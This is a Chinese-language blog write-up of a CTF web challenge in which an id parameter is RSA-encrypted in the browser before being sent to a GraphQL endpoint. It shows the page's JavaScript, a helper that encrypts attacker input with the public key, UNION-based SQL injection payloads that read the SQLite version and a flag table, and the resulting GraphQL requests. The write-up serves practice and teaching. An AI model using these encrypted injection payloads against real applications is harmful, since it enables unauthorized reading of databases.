CTF练习-Web系列-SQLI(二)

CTF / Web / SQL注入
字数统计: 440   |   阅读时长≈ 2 分钟

CTF练习-Web系列-SQLI(二)

infantsql这道题是前一道题的升级版本,只是在前端调用JSEncrpy第三方库利用公钥进行RSA加密id参数。

解题过程

信息获取

首先对其搜索框进行注入点探测,可以看到id参数进行了加密

然后查看题目前端 JS代码如何加密id参数,可以看到前端调用 JSEncrpy第三方库使用公钥对id参数进行加密处理 。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
function doSubmitForm(){
    var pkey = "-----BEGIN PUBLIC KEY-----\n"+
        "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIk4a0KYnqOLmJPxNGQkotihoo\n"+
        "994QXmk+7M8WCS5U7kWdhfMqiyjpKzuMaRB8Aydo2bbTNjHhATTRTUIvlpqNzEob\n"+
        "CSWuNFc3j3Nlk/I5ySdFo0INzlHnJtbwKQoHon0ctmyffovYNg5Ar8LPz6RbsiA7\n"+
        "3Ic4McekZIkdJH08cwIDAQAB\n"+
        "-----END PUBLIC KEY-----"
    var ajax = new XMLHttpRequest();
    ajax.open('POST',"/graphql");
    ajax.setRequestHeader("content-type", "application/x-www-form-urlencoded; charset=utf-8");
    var id = document.getElementById('id').value;
    var encrypt = new JSEncrypt();
    encrypt.setPublicKey(pkey);
    id = encrypt.encrypt(id);
    id =  window.btoa(id);
    ajax.send("query={getscorewithid(id:\""+id+"\"){ id name score }}");

    ajax.onreadystatechange = function () {
       if (ajax.readyState==4 && ajax.status==200) {
            alert(ajax.responseText);
       }
    }
}

接下来的步骤和第一道是一样的,查询出存在的getscorewithname方法及其包含的参数name score

注入测试

在注入过程中只需要使用 上方JS给定的公钥进行加密处理,然后放进请求包中即可进行注入查询

js加密参数代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
const parse = (str) => {
  const pkey = `-----BEGIN PUBLIC KEY-----
  MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDIk4a0KYnqOLmJPxNGQkotihoo
  994QXmk+7M8WCS5U7kWdhfMqiyjpKzuMaRB8Aydo2bbTNjHhATTRTUIvlpqNzEob
  CSWuNFc3j3Nlk/I5ySdFo0INzlHnJtbwKQoHon0ctmyffovYNg5Ar8LPz6RbsiA7
  3Ic4McekZIkdJH08cwIDAQAB
  -----END PUBLIC KEY-----`;
  const jsEncrypt = new JSEncrypt()
  jsEncrypt.setPublicKey(pkey);
  const data = jsEncrypt.encrypt(str);
  const result = window.btoa(data)
  return result;
}
parse("payload")

查询数据库版本

1
2
parse("' UNION SELECT SQLITE_VERSION() '")
// cVlHc25oQ3Y0NGRPV1JEaG56cFBEYWJEZzZqK0VJWjBkdHlnbk9WTU5sQmU4aWVFb3JWekN5clJtb081VFVXT2VWZTBpYjJGUy8va29EZGZSOGJpc0h2UkNJdVJ3bXVKWnVBOUhRTWxKYSs4MS9LR0hiSUpxL0VFY1BqMWFOdFVXbGsrcG9OMzlOL0xrTzBtT1h4T09kanVVVVNPMkZVam9CSnFIRFJrV3VjPQ==
1
2
3
4
5
6
7
query={
getscorewithname(name:"cVlHc25oQ3Y0NGRPV1JEaG56cFBEYWJEZzZqK0VJWjBkdHlnbk9WTU5sQmU4aWVFb3JWekN5clJtb081VFVXT2VWZTBpYjJGUy8va29EZGZSOGJpc0h2UkNJdVJ3bXVKWnVBOUhRTWxKYSs4MS9LR0hiSUpxL0VFY1BqMWFOdFVXbGsrcG9OMzlOL0xrTzBtT1h4T09kanVVVVNPMkZVam9CSnFIRFJrV3VjPQ=="){
  name
  score
  }

}

构造查询数据获取表名flag

1
2
' UNION SELECT (SELECT flag from flag)'
//SzJYbWZzc29ackpCQWY1SFZPS2ZFZjlnbW5mRk5tV3V1dWp3bnhtcTFLTDc5TkhDenZKcXQybm90VmVKM2F1QjdISkVlS0piaDRkdXJyMXVPVmtTRUVGYjN1Q0JUUE9vblFNNlBqVk1qb0RUR1ZBbTd2OGtXbWxseXFkckR2UlhsTStLYXlTcCtJaHRKSjNrSm9jNlNXM3pJTzFBOGNMeEY2ckZsUDYyKzVFPQ==
1
2
3
4
5
6
query={
  getscorewithname(name:"SzJYbWZzc29ackpCQWY1SFZPS2ZFZjlnbW5mRk5tV3V1dWp3bnhtcTFLTDc5TkhDenZKcXQybm90VmVKM2F1QjdISkVlS0piaDRkdXJyMXVPVmtTRUVGYjN1Q0JUUE9vblFNNlBqVk1qb0RUR1ZBbTd2OGtXbWxseXFkckR2UlhsTStLYXlTcCtJaHRKSjNrSm9jNlNXM3pJTzFBOGNMeEY2ckZsUDYyKzVFPQ=="){
  name
  score
  }
}

得到flag为:flag{Rea1_flag_1s_Me}

打赏
  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2021-2024 John Doe
  • 访问人数: | 浏览次数:

让我给大家分享喜悦吧!

微信